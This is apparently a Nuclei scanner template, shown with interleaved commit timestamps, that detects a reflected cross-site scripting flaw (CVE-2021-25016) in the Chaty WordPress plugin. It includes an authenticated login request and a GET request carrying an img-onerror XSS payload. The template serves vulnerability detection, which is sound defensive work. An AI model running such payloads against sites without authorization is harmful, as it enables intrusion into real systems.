2023-10-16 18:37:06 +00:00
id : CVE-2021-25016
info :
2023-10-17 08:16:05 +00:00
name : Chaty < 2.8.2 - Cross-Site Scripting
author : luisfelipe146
2023-10-16 18:37:06 +00:00
severity : medium
description : |
2023-10-17 08:16:05 +00:00
The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
remediation : Fixed in 2.8.3
2023-10-16 18:37:06 +00:00
reference :
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
2023-10-17 08:16:05 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-25016
2023-10-16 18:37:06 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
2023-10-17 08:16:05 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2023-10-17 17:52:26 +00:00
cve-id : CVE-2021-25016
2023-10-17 08:16:05 +00:00
cwe-id : CWE-79
2023-10-17 17:52:26 +00:00
epss-score : 0.00106
2023-11-05 22:23:39 +00:00
epss-percentile : 0.42986
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
2023-10-16 18:37:06 +00:00
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 2
vendor : premio
product : chaty
framework : wordpress
2023-10-17 08:16:05 +00:00
publicwww-query : "/wp-content/plugins/chaty/"
2023-10-17 17:52:26 +00:00
tags : wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty
2023-10-16 18:37:06 +00:00
http :
2023-10-17 08:16:05 +00:00
- raw :
2023-10-16 18:37:06 +00:00
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
2023-10-17 08:16:05 +00:00
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
2023-10-16 18:37:06 +00:00
Host : {{Hostname}}
2023-10-17 17:52:26 +00:00
2023-10-16 18:37:06 +00:00
cookie-reuse : true
2023-10-17 17:52:26 +00:00
2023-10-17 08:16:05 +00:00
matchers-condition : and
2023-10-16 18:37:06 +00:00
matchers :
2023-10-17 08:16:05 +00:00
- type : word
part : body
words :
- "search=</script><img src onerror=alert(document.domain)>"
- "chaty_page_chaty"
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
2023-10-17 17:52:26 +00:00
- 200
2023-11-06 09:19:20 +00:00
# digest: 4b0a00483046022100c12284c4202d6e1f4da65cdeebffe1f8a15a76ff677037f4fe42c60f014a28eb02210088c0afed1d41e330d98bca6fb947f9617b88cfb01f0eac35bae254af9f67e068:922c64590222798bb761d5b6d8e72950